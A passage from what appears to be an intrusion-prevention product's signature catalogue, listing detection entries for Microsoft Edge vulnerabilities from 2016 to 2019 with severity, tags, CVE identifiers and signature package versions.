Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1010-5242
Last changed: sgpkg-ips-1690-5242
Vulnerability: Microsoft-Edge-Doloopbodystart-Out-Of-Bounds-Read
Description:
Back to top

File-Text_Microsoft-Edge-Frame-Elements-Same-Origin-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2017-03, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-872-5242
Last changed: sgpkg-ips-1589-5242
Vulnerability: Microsoft-Edge-Frame-Elements-Same-Origin-Policy-Bypass
Description:
Back to top

File-Text_Microsoft-Edge-Information-Disclosure-CVE-2018-8545

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-11, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1115-5242
Last changed: sgpkg-ips-1115-5242
Vulnerability: Microsoft-Edge-Information-Disclosure-CVE-2018-8545
Description:
Back to top

File-Text_Microsoft-Edge-Information-Disclosure-Vulnerability-CVE-2016-3277

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2016-07, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-777-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Information-Disclosure-Vulnerability-CVE-2016-3277
Description:
Back to top

File-Text_Microsoft-Edge-Information-Disclosure-Vulnerability-CVE-2017-0017

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Edge, MS2017-03, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Miscrosoft-Edge-Information-Disclosure-Vulnerability-CVE-2017-0017
Description:
Back to top

File-Text_Microsoft-Edge-InstanceOf-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1150-5242
Vulnerability: Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0893
Microsoft-Edge-InstanceOf-Type-Confusion
Description:
Back to top

File-Text_Microsoft-Edge-JavaScript-Engine-Array.shift-Method-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2016-05, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-771-5211
Last changed: sgpkg-ips-771-5211
Vulnerability: Microsoft-Edge-JavaScript-Engine-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Edge-JavaScript-Engine-Array.unshift-Method-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2016-05, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-769-5211
Vulnerability: Microsoft-Edge-JavaScript-Engine-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Edge-Memory-Corruption-CVE-2016-0024

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2016-01, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Memory-Corruption-CVE-2016-0024
Description:
Back to top

File-Text_Microsoft-Edge-Memory-Corruption-CVE-2016-3199

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2016-06, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-770-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Memory-Corruption-CVE-2016-3199
Description:
Back to top

File-Text_Microsoft-Edge-Memory-Corruption-CVE-2016-3222

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2016-06, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-770-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Memory-Corruption-CVE-2016-3222
Description:
Back to top

File-Text_Microsoft-Edge-Memory-Corruption-CVE-2016-3271

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Edge, MS2016-07, CVE2016, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-777-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Memory-Corruption-CVE-2016-3271
Description:
Back to top

File-Text_Microsoft-Edge-Memory-Corruption-CVE-2017-0010

About this situation: An attempt to exploit a vulnerability in Microsoft Edge
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2017-03, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Microsoft-Edge-Memory-Corruption-CVE-2017-0010
Description:
Back to top

File-Text_Microsoft-Edge-Memory-Corruption-CVE-2017-0141

About this situation: An attempt to exploit a vulnerability in Microsoft Edge
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2017-03, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Microsoft-Edge-Memory-Corruption-CVE-2017-0141
Description:
Back to top

File-Text_Microsoft-Edge-Memory-Corruption-CVE-2018-0980

About this situation: An attempt to exploit a vulnerability in Microsoft Edge was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-04, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Memory-Corruption-CVE-2018-0980
Description:
Back to top

File-Text_Microsoft-Edge-Memory-Corruption-CVE-2018-8110

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-06, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1075-5242
Vulnerability: Microsoft-Edge-Memory-Corruption-CVE-2018-8110
Description:
Back to top

File-Text_Microsoft-Edge-Memory-Corruption-CVE-2018-8111

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-06, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1075-5242
Vulnerability: Microsoft-Edge-Memory-Corruption-CVE-2018-8111
Description:
Back to top

File-Text_Microsoft-Edge-Memory-Corruption-CVE-2018-8236

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-06, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1075-5242
Vulnerability: Microsoft-Edge-Memory-Corruption-CVE-2018-8236
Description:
Back to top

File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2016-0191

About this situation: Detected attempt to exploit a vulnerability in Microsoft Edge
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2016-05, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-762-5211
Last changed: sgpkg-ips-762-5211
Vulnerability: Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2016-0191
Description:
Back to top

File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0758

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1029-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0758
Description:
Back to top

File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0762

About this situation: An attempt to exploit a vulnerability in Microsoft Edge or Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, Microsoft Edge, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1029-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0762
Description:
Back to top

File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0777

About this situation: An attempt to exploit a vulnerability in Microsoft Edge
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1029-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0777
Description:
Back to top

File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0872

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1050-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0872
Description:
Back to top

File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0874

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1050-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0874
Description:
Back to top

File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0889

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, CVE2018, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1050-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0889
Description:
Back to top

File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0930

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1050-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0930
Description:
Back to top

File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0933

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1050-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0933
Description:
Back to top

File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0934

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1050-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0934
Description:
Back to top

File-Text_Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2018-8137

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-05, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1065-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2018-8137
Description:
Back to top

File-Text_Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0610

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-02, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1132-5242
Vulnerability: Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0610
Description:
Back to top

File-Text_Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0644

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-02, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1132-5242
Vulnerability: Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0644
Description:
Back to top

File-Text_Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0648

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-02, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1132-5242
Vulnerability: Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0648
Description:
Back to top

File-Text_Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0652

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-02, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1132-5242
Vulnerability: Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0652
Description:
Back to top

File-Text_Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0658

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-02, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1132-5242
Vulnerability: Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0658
Description:
Back to top

File-Text_Microsoft-Edge-PreVisitCatch-Uninitialized-Memory-Use

About this situation: A Microsoft Edge PreVisitCatch Uninitialized Memory Use vulnerability
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, CVE2017, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-983-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-PreVisitCatch-Uninitialized-Memory-Use
Description:
Back to top

File-Text_Microsoft-Edge-Profiledldelem-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2017-03, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-866-5242
Last changed: sgpkg-ips-866-5242
Vulnerability: Microsoft-Edge-Profiledldelem-Type-Confusion
Description:
Back to top

File-Text_Microsoft-Edge-RCE-CVE-2017-0200

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Edge, MS2017-04, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-876-5242
Last changed: sgpkg-ips-876-5242
Vulnerability: Miscrosoft-Edge-RCE-CVE-2017-0200
Description:
Back to top

File-Text_Microsoft-Edge-RCE-CVE-2017-0227

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Edge, MS2017-05, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-900-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-RCE-CVE-2017-0227
Description:
Back to top

File-Text_Microsoft-Edge-RCE-CVE-2017-0228

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Edge, MS2017-05, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-900-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-RCE-CVE-2017-0228
Description:
Back to top

File-Text_Microsoft-Edge-RCE-CVE-2017-0236

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Edge, MS2017-05, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-900-5242
Last changed: sgpkg-ips-1858-5242
Vulnerability: Microsoft-Edge-RCE-CVE-2017-0236
Description:
Back to top

File-Text_Microsoft-Edge-RCE-CVE-2017-0238

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Edge, MS2017-05, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-900-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-RCE-CVE-2017-0238
Description:
Back to top

File-Text_Microsoft-Edge-RCE-CVE-2017-0240

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Edge, MS2017-05, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-900-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-RCE-CVE-2017-0240
Description:
Back to top

File-Text_Microsoft-Edge-Remote-Code-Execution-CVE-2019-0541

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-01, CVE2019, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1124-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Remote-Code-Execution-CVE-2019-0541
Description:
Back to top

File-Text_Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8496

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2017-06, CVE2017, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-930-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8496
Description:
Back to top

File-Text_Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8496-2

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2017-06, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-941-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8496
Description:
Back to top

File-Text_Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8497

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2017-06, CVE2017, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-930-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8497
Description:
Back to top

File-Text_Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8617

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2017-07, CVE2017, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-944-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8617
Description:
Back to top

File-Text_Microsoft-Edge-Scripting-Engine-CVE-2016-7240-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2016-11, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-824-5242
Last changed: sgpkg-ips-824-5242
Vulnerability: Microsoft-Edge-Scripting-Engine-CVE-2016-7240-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8367

About this situation: An attempt to exploit a vulnerability in Chakra scripting engine detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-09, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1101-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8367
Description:
Back to top

File-Text_Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8391

About this situation: An attempt to exploit a vulnerability in scripting engine detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-09, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1101-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8391
Description:
Back to top

File-Text_Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8459

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-09, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1101-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8459
Description:
Back to top

File-Text_Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2019-0539

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-01, CVE2019, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1124-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2019-0539
Description:
Back to top

File-Text_Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2019-0565

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-01, CVE2019, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1124-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2019-0565
Description:
Back to top

File-Text_Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2019-0568

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-01, CVE2019, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1124-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2019-0568
Description:
Back to top

File-Text_Microsoft-Edge-Security-Feature-Bypass-CVE-2016-3198

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2016-06, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-770-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Security-Feature-Bypass-CVE-2016-3198
Description:
Back to top

File-Text_Microsoft-Edge-Spoofing-Vulnerability-CVE-2018-8383

About this situation: An attempt to exploit a vulnerability in Microsoft Edge
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-08, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1092-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Spoofing-Vulnerability-2018-8383
Description:
Back to top

File-Text_Microsoft-Edge-Type-Confusion-CVE-2018-8588

About this situation: An attempt to exploit a vulnerability in Microsoft Scripting Engine detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-11, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1115-5242
Last changed: sgpkg-ips-1115-5242
Vulnerability: Microsoft-Edge-Type-Confusion-CVE-2018-8588
Description:
Back to top

File-Text_Microsoft-Edge-Type-Confusion-Remote-Code-Execution-CVE-2017-8524

About this situation: A Microsoft Edge Type Confusion Remote Code Execution CVE-2017-8524 vulnerability
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2017-06, CVE2017, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-930-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Type-Confusion-Remote-Code-Execution-CVE-2017-8524
Description:
Back to top

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2017-8601

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2017-07, CVE2017, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-944-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2017-8601
Description:
Back to top

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-0951

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-05, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1065-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-0951
Description:
Back to top

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-0953

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-05, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1065-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-0953
Description:
Back to top

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-0993

